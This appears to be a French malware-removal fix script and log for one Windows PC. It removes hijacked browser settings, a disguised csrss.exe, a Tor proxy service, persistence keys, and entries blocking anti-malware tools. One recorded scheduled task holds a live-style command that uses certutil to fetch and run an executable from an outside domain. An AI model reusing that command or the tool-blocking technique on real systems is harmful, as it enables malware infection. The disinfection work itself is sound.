ShellExecuteHooks: Pas de nom - {BFD98515-CD74-48A4-98E2-13D209E3EE4F} - -> Pas de fichier
GroupPolicy: Restriction ?
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction
HKU\S-1-5-21-1000389763-2980830304-2624313999-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iYh7SmU9Toh2f2c4s_UDCiHA3EU7TXj9eNbsR4cyT7Dr6AORoMzvo3utxRHbkW4CopZRyibbguzjc0VL-paGa3NyP81J3Cs8-pTABl3e-pyq4ZWBcn9hnTJHGOkOnoN-YU6xKAotgHHxYd1HR-va5mbcd3mLUoK38bQ96c7HTc,&q={searchTerms}
HKU\S-1-5-21-1000389763-2980830304-2624313999-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iYh7SmU9Toh2f2c4s_UDCiHA3EU7TXj9eNbsR4cyT7Dr6AORoMzvo3utxRHbkW4CopZRyibbguzjc0VIw0Ea9M9NwjWSgQx681kLU54KEqjUkxUqMUhO_m2prc2KW_LeC02giXAoVkWV8PIHUzWwAvWYpuQnbGo6_s8RYuoH_U,
SearchScopes: HKU\S-1-5-21-1000389763-2980830304-2624313999-1000 -> {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL = hxxp://go.mail.ru/distib/ep/?q={searchTerms}&fr=ntg&product_id=%7B6B5028FF-F684-450C-BA49-20DA4C8278F2%7D&gp=811610
BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> Pas de fichier
FF HKLM-x32\...\Firefox\Extensions: [otis@digitalpersona.com] - C:\Program Files (x86)\DigitalPersona\Bin\FirefoxExt => non trouvé(e)
FF HKU\S-1-5-21-1000389763-2980830304-2624313999-1000\...\Firefox\Extensions: [acewebextension_unlisted@acestream.org] - C:\Users\patou\AppData\Roaming\ACEStream\extensions\awe\firefox\acewebextension_unlisted.xpi => non trouvé(e)
CHR res: infecté resources.pak (Adware script). Réinstallez Chrome.
CHR HomePage: Default -> inline.go.mail.ru
CHR DefaultSearchURL: Default -> hxxps://inline.go.mail.ru/search?inline_comp=dse&q={searchTerms}&fr=chxtn12.0.23
CHR DefaultSearchKeyword: Default -> inline.go.mail.ru
CHR DefaultSuggestURL: Default -> hxxp://suggests.go.mail.ru/chrome?q={searchTerms}
CHR Extension: (Домашняя страница Mail.Ru) - C:\Users\patou\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcadgijmedbfgciegjomfpjcdchlhnif [2018-06-04]
R2 WinDefender; C:\Windows\windefender.exe [0 ] () <==== ATTENTION (zéro octet Fichier/Dossier)
S4 TCPSvc; "C:\Users\patou\AppData\Local\Temp\csrss\proxy\tor.exe" --nt-service -f "C:\Users\patou\AppData\Local\Temp\csrss\proxy\config" --Log "notice file C:\Users\patou\AppData\Local\Temp\csrss\proxy\t"
S1 mwescontroller; \??\C:\Windows\system32\drivers\mwescontroller.sys [X]
C:\Windows\rss\csrss.exe
C:\Users\patou\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
2018-06-04 16:03 - 2018-06-04 16:03 - 000492544 _____ () C:\Users\patou\AppData\Local\Temp\s3.exe
DeleteKey: HKLM\SYSTEM\CurrentControlSet\Services\TCPSvc
C:\Users\patou\AppData\Local\Temp\csrss\proxy\tor.exe
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{72449F31-D047-4C58-925B-334EFCB1471D
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{72449F31-D047-4C58-925B-334EFCB1471D
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{72449F31-D047-4C58-925B-334EFCB1471D
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Maintenance\{72449F31-D047-4C58-925B-334EFCB1471D
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{72449F31-D047-4C58-925B-334EFCB1471D
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{72449F31-D047-4C58-925B-334EFCB1471D
C:\Windows\System32\Tasks\csrss
C:\Windows\rss\csrss.exe
DeleteValue: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run|AutumnWater
DeleteValue: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run|CloudNet
C:\Users\patou\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
DeleteValue: HKU\S-1-5-21-1000389763-2980830304-2624313999-1000\Software\Microsoft\Windows\CurrentVersion\Run|AutumnWater
DeleteValue: HKU\S-1-5-21-1000389763-2980830304-2624313999-1000\Software\Microsoft\Windows\CurrentVersion\Run|CloudNet
C:\Windows\Temp\gEA11.tmp.exe
C:\Windows\windefender.exe
C:\Users\patou\AppData\Local\Temp\wup\wupv.exe
DeleteKey: HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}
DeleteKey: HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}
DeleteKey: HKLM\SOFTWARE\Classes\CLSID\{8A69D345-D564-463c-AFF1-A69D9E530F96}
DeleteKey: HKCR\CLSID\{8A69D345-D564-463c-AFF1-A69D9E530F96}
DeleteKey: HKCU\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\CloudNet
DeleteKey: HKCU\SOFTWARE\Chromium
DeleteKey: HKCU\SOFTWARE\EpicNet Inc.
DeleteKey: HKU\S-1-5-21-1000389763-2980830304-2624313999-1000\SOFTWARE\EpicNet Inc.
C:\ProgramData\SupportAssist
C:\ProgramData\SWCUTemp
C:\Users\patou\AppData\Roaming\EpicNet Inc
DeleteValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks|{BFD98515-CD74-48A4-98E2-13D209E3EE4F}
DeleteKey: HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\Glary Utilities
DeleteKey: HKLM\Software\Classes\CLSID\{B3C418F8-922B-4faf-915E-59BC14448CF7}
DeleteKey: HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\Glarysoft MalwareHunter
DeleteKey: HKLM\Software\Classes\CLSID\{EA847F47-97F1-4D78-AB99-C63CA1C327F0}
DeleteKey: HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\WinRAR32
DeleteKey: HKLM\Software\Classes\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA}
DeleteKey: HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\Glarysoft MalwareHunter
DeleteKey: HKLM\Software\Classes\CLSID\{EA847F47-97F1-4D78-AB99-C63CA1C327F0}
DeleteKey: HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\WinRAR32
DeleteKey: HKLM\Software\Classes\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA}
DeleteKey: HKLM\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\Glarysoft MalwareHunter
DeleteKey: HKLM\Software\Classes\CLSID\{EA847F47-97F1-4D78-AB99-C63CA1C327F0}
DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\AthBtTray
DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\AtherosBtStack
DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\AutumnWater
DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\CloudNet
DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\FLxHCIm64
DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\HP Deskjet 3050A J611 series (NET)
DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\MSC
DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Skype
unlock: C:\Windows\System32\drivers\WinmonProcessMonitor.sys
C:\Windows\System32\drivers\WinmonProcessMonitor.sys
C:\ProgramData\Blogger\Blogger.exe
C:\Users\patou\AppData\Roaming\Folder\Service.exe
C:\Users\patou\AppData\Roaming\ZHP\Quarantine\ZHPCleaner\cloudnet.exe
C:\Users\patou\AppData\Roaming\ZHP\Quarantine\ZHPCleaner\csrss.exe
C:\Users\patou\AppData\Roaming\ZHP\Quarantine\ZHPCleaner\g5D.tmp.exe
C:\Users\patou\AppData\Roaming\ZHP\Quarantine\ZHPCleaner\gC705.tmp.exe
C:\Users\patou\AppData\Roaming\ZHP\Quarantine\ZHPCleaner\WinmonProcessMonitor.sys
C:\Windows\Installer\18f77.msi
C:\Windows\Installer\1c581e4.msp
C:\Windows\Installer\316307.msp
C:\Windows\Installer\3fde3c.msp
C:\Windows\Installer\cd260c.msp
C:\Windows\Installer\cf5db.msp
DeleteKey: HKLM\SYSTEM\CurrentControlSet\Services\TCPSvc
C:\Users\patou\AppData\Local\Temp\csrss\proxy\tor.exe
C:\Windows\rss\csrss.exe
C:\Windows\System32\Tasks\csrss
C:\Users\patou\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
C:\Windows\Temp\gEA11.tmp.exe
C:\Windows\windefender.exe
C:\Users\patou\AppData\Local\Temp\wup\wupv.exe
DeleteKey: HKLM\Software\WOW6432Node\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}
DeleteKey: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CloudNet
C:\Users\patou\AppData\Roaming\EpicNet Inc
DeleteKey: HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\Glary Utilities
DeleteKey: HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\Glarysoft MalwareHunter
DeleteKey: HKLM\Software\Wow6432Node\Classes\CLSID\{EA847F47-97F1-4D78-AB99-C63CA1C327F0}
DeleteKey: HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\WinRAR32
DeleteKey: HKLM\Software\Classes\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA}
DeleteKey: HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\Glarysoft MalwareHunter
DeleteKey: HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\WinRAR32
DeleteKey: HKLM\Software\Classes\Drive\shellex\ContextMenuHandlers\Glarysoft MalwareHunter
DeleteKey: HKLM\SOFTWARE\Wow6432Node\Microsoft\Shared Tools\MSConfig\startupreg\AutumnWater
DeleteKey: HKLM\SOFTWARE\Wow6432Node\Microsoft\Shared Tools\MSConfig\startupreg\CloudNet
C:\Windows\System32\drivers\WinmonProcessMonitor.sys
C:\Users\patou\AppData\Roaming\ZHP\Quarantine\ZHPCleaner\cloudnet.exe
DeleteValue: HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules|{421C7726-58B8-40A1-983B-971B4487B150}
DeleteValue: HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules|{A0B09702-C233-4909-9E68-D442F9E01024}
DeleteValue: HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules|{9AA2D37C-F863-49A3-A2F2-E99222C76020}
DeleteValue: HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules|{7205486D-6178-404B-A2CB-BB4A4963CFF6}
C:\Windows\Installer\18f77.msi
C:\Windows\Installer\1c581e4.msp
C:\Windows\Installer\316307.msp
C:\Windows\Installer\3fde3c.msp
C:\Windows\Installer\c0c16.msp
C:\Windows\Installer\cd260c.msp
C:\Windows\Installer\cf5db.msp
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Pas de fichier
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Pas de fichier
ShellIconOverlayIdentifiers: [snxPluginsShell] -> {F4B3B0AA-13D1-4a36-BDA2-2055B0F3D5DE} => -> Pas de fichier
ShellIconOverlayIdentifiers: [{BFD98515-CD74-48A4-98E2-13D209E3EE4F}] -> {BFD98515-CD74-48A4-98E2-13D209E3EE4F} => -> Pas de fichier
ContextMenuHandlers1: [Glary Utilities] -> {B3C418F8-922B-4faf-915E-59BC14448CF7} => -> Pas de fichier
Task: {72449F31-D047-4C58-925B-334EFCB1471D} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-06-04] ()
Task: {72449F31-D047-4C58-925B-334EFCB1471D} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-06-04] ()
Task: {735BB0D7-C364-4093-8CEB-5CADB85B296C} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://dp.fastandcoolest.com/app/4/app.exe C:\Users\patou\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\patou\AppData\Local\Temp\csrss\scheduled.exe /31340
Task: {75D278E1-C0D0-450A-B832-21A5DFEF0CC6} - System32\Tasks\SgeepHD => C:\Windows\system32\rundll32.exe "C:\Program Files\SgeepHD\SgeepHD.dll",kxQxWs
AlternateDataStreams: C:\ProgramData\TEMP:05E9FFE5 [152]
AlternateDataStreams: C:\ProgramData\TEMP:5D432CE3 [124]
FirewallRules: [{9E242FAA-39B1-4AF0-87CA-A8A1D2CB1450}] => (Allow) C:\Windows\system32\rundll32.exe
FirewallRules: [{CFEFC8C3-84C6-4E92-8FE2-CF7D734025ED}] => (Allow) C:\Windows\System32\rundll32.exe
FirewallRules: [{D5919E89-E2DE-4E6A-B7D9-097A43262348}] => (Allow) C:\Windows\System32\rundll32.exe
FirewallRules: [{421C7726-58B8-40A1-983B-971B4487B150}] => (Allow) C:\Windows\rss\csrss.exe
FirewallRules: [{A0B09702-C233-4909-9E68-D442F9E01024}] => (Allow) C:\Windows\rss\csrss.exe
FirewallRules: [{0B3B15B8-A375-4D87-BBEB-F65AC94E2C12}] => (Allow) C:\Windows\System32\rundll32.exe
FirewallRules: [{CD247549-C72F-49F2-93E8-EABC28C3E0FD}] => (Allow) C:\Windows\System32\rundll32.exe
FirewallRules: [{9AA2D37C-F863-49A3-A2F2-E99222C76020}] => (Allow) C:\Windows\rss\csrss.exe
FirewallRules: [{7205486D-6178-404B-A2CB-BB4A4963CFF6}] => (Allow) C:\Users\patou\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
EmptyTemp:
*****************
Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\03D22C9C66915D58C88912B64C1F984B8344EF09" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\0F684EC1163281085C6AF20528878103ACEFCAAB" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\1667908C9E22EFBD0590E088715CC74BE4C60884" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\18DEA4EFA93B06AE997D234411F3FD72A677EECE" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\249BDA38A611CD746A132FA2AF995A2D3C941264" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\31AC96A6C17C425222C46D55C3CCA6BA12E54DAF" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\331E2046A1CCA7BFEF766724394BE6112B4CA3F7" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3353EA609334A9F23A701B9159E30CB6C22D4C59" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\373C33726722D3A5D1EDD1F1585D5D25B39BEA1A" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3D496FA682E65FC122351EC29B55AB94F3BB03FC" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4420C99742DF11DD0795BC15B7B0ABF090DC84DF" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\5240AB5B05D11B37900AC7712A3C6AE42F377C8C" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\5DD3D41810F28B2A13E9A004E6412061E28FA48D" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\7457A3793086DBB58B3858D6476889E3311E550E" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\76A9295EF4343E12DFC5FE05DC57227C1AB00D29" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\775B373B33B9D15B58BC02B184704332B97C3CAF" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\872CD334B7E7B3C3D1C6114CD6B221026D505EAB" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\88AD5DFE24126872B33175D1778687B642323ACF" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9132E8B079D080E01D52631690BE18EBC2347C1E" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\982D98951CF3C0CA2A02814D474A976CBFF6BDB1" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9C43F665E690AB4D486D4717B456C5554D4BCEB5" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9E3F95577B37C74CA2F70C1E1859E798B7FC6B13" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A5341949ABE1407DD7BF7DFE75460D9608FBC309" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A59CC32724DD07A6FC33F7806945481A2D13CA2F" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AD4C5429E10F4FF6C01840C20ABA344D7401209F" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AD96BB64BA36379D2E354660780C2067B81DA2E0" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\CDC37C22FE9272D8F2610206AD397A45040326B8" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\DB303C9B61282DE525DC754A535CA2D6A9BD3D87" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\DB77E5CFEC34459146748B667C97B185619251BA" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\E22240E837B52E691C71DF248F12D27F96441C00" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\ED841A61C0F76025598421BC1B00E24189E68D54" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\F83099622B4A9F72CB5081F742164AD1B8D048C9" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\FBB42F089AF2D570F2BF6F493D107A3255A9BB1A" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\FFFA650F2CB2ABC0D80527B524DD3F9FC172C138" => supprimé(es) avec succès
"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" => supprimé(es) avec succès
"HKU\S-1-5-21-1000389763-2980830304-2624313999-1000\Software\Microsoft\Windows\CurrentVersion\Run\\AutumnWater" => supprimé(es) avec succès
"HKU\S-1-5-21-1000389763-2980830304-2624313999-1000\Software\Microsoft\Windows\CurrentVersion\Run\\CloudNet" => supprimé(es) avec succès
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\7za.exe" => supprimé(es) avec succès
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\assistant.exe" => supprimé(es) avec succès
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\hola.exe" => supprimé(es) avec succès
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\hola_setup.exe" => supprimé(es) avec succès
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\hola_svc.exe" => supprimé(es) avec succès
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\hola_updater.exe" => supprimé(es) avec succès
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\IMF_ActionCenterDownloader.exe" => supprimé(es) avec succès
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\malwarebytes_assistant.exe" => supprimé(es) avec succès
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\mbam.exe" => supprimé(es) avec succès
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\mbamdor.exe" => supprimé(es) avec succès
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\mbampt.exe" => supprimé(es) avec succès
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\mbamresearch.exe" => supprimé(es) avec succès
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\mbamscheduler.exe" => supprimé(es) avec succès
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\mbamservice.exe" => supprimé(es) avec succès
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\mbamtray.exe" => supprimé(es) avec succès
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\mweshield.exe" => supprimé(es) avec succès
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\mweshieldup.exe" => supprimé(es) avec succès
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\mwesmanager.exe" => supprimé(es) avec succès
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\mwessweeper.exe" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\\{BFD98515-CD74-48A4-98E2-13D209E3EE4F}" => supprimé(es) avec succès
HKLM\Software\Classes\CLSID\{BFD98515-CD74-48A4-98E2-13D209E3EE4F} => non trouvé(e)
C:\Windows\system32\GroupPolicy\Machine => déplacé(es) avec succès
C:\Windows\system32\GroupPolicy\GPT.ini => déplacé(es) avec succès
"HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer" => supprimé(es) avec succès
HKU\S-1-5-21-1000389763-2980830304-2624313999-1000\Software\Microsoft\Internet Explorer\Main\\Search Page => valeur restauré(es) avec succès
HKU\S-1-5-21-1000389763-2980830304-2624313999-1000\Software\Microsoft\Internet Explorer\Main\\Start Page => valeur restauré(es) avec succès
"HKU\S-1-5-21-1000389763-2980830304-2624313999-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{FFEBBF0A-C22C-4172-89FF-45215A135AC7}" => supprimé(es) avec succès
HKLM\Software\Classes\CLSID\{FFEBBF0A-C22C-4172-89FF-45215A135AC7} => non trouvé(e)
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}" => supprimé(es) avec succès
"HKLM\Software\Wow6432Node\Classes\CLSID\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}" => supprimé(es) avec succès
"HKLM\Software\Wow6432Node\Mozilla\Firefox\Extensions\\otis@digitalpersona.com" => supprimé(es) avec succès
"HKU\S-1-5-21-1000389763-2980830304-2624313999-1000\Software\Mozilla\Firefox\Extensions\\acewebextension_unlisted@acestream.org" => supprimé(es) avec succès
CHR res: infecté resources.pak (Adware script). Réinstallez Chrome. => Erreur: Pas de correction automatique trouvée pour cet élément.
"Chrome HomePage" => supprimé(es) avec succès
"Chrome DefaultSearchURL" => supprimé(es) avec succès
"Chrome DefaultSearchKeyword" => supprimé(es) avec succès
"Chrome DefaultSuggestURL" => supprimé(es) avec succès
CHR Extension: (Домашняя страница Mail.Ru) - C:\Users\patou\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcadgijmedbfgciegjomfpjcdchlhnif [2018-06-04] => Erreur: Pas de correction automatique trouvée pour cet élément.
WinDefender => Impossible d'arrêter le service.
"HKLM\System\CurrentControlSet\Services\WinDefender" => supprimé(es) avec succès
WinDefender => service supprimé(es) avec succès
"HKLM\System\CurrentControlSet\Services\TCPSvc" => supprimé(es) avec succès
TCPSvc => service supprimé(es) avec succès
"HKLM\System\CurrentControlSet\Services\mwescontroller" => supprimé(es) avec succès
mwescontroller => service supprimé(es) avec succès
C:\Windows\rss\csrss.exe => déplacé(es) avec succès
C:\Users\patou\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe => déplacé(es) avec succès
C:\Users\patou\AppData\Local\Temp\s3.exe => déplacé(es) avec succès
HKLM\SYSTEM\CurrentControlSet\Services\TCPSvc => non trouvé(e)
C:\Users\patou\AppData\Local\Temp\csrss\proxy\tor.exe => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{72449F31-D047-4C58-925B-334EFCB1471D => non trouvé(e)
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{72449F31-D047-4C58-925B-334EFCB1471D => non trouvé(e)
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{72449F31-D047-4C58-925B-334EFCB1471D => non trouvé(e)
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Maintenance\{72449F31-D047-4C58-925B-334EFCB1471D" => non trouvé(e)
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{72449F31-D047-4C58-925B-334EFCB1471D => non trouvé(e)
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{72449F31-D047-4C58-925B-334EFCB1471D => non trouvé(e)
C:\Windows\System32\Tasks\csrss => déplacé(es) avec succès
"C:\Windows\rss\csrss.exe" => non trouvé(e)
"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\AutumnWater" => non trouvé(e)
"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\CloudNet" => non trouvé(e)
"C:\Users\patou\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe" => non trouvé(e)
"HKU\S-1-5-21-1000389763-2980830304-2624313999-1000\Software\Microsoft\Windows\CurrentVersion\Run\\AutumnWater" => non trouvé(e)
"HKU\S-1-5-21-1000389763-2980830304-2624313999-1000\Software\Microsoft\Windows\CurrentVersion\Run\\CloudNet" => non trouvé(e)
C:\Windows\Temp\gEA11.tmp.exe => déplacé(es) avec succès
Impossible de déplacer "C:\Windows\windefender.exe" => Planifié pour déplacement au redémarrage.
C:\Users\patou\AppData\Local\Temp\wup\wupv.exe => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}" => supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96} => non trouvé(e)
HKLM\SOFTWARE\Classes\CLSID\{8A69D345-D564-463c-AFF1-A69D9E530F96} => non trouvé(e)
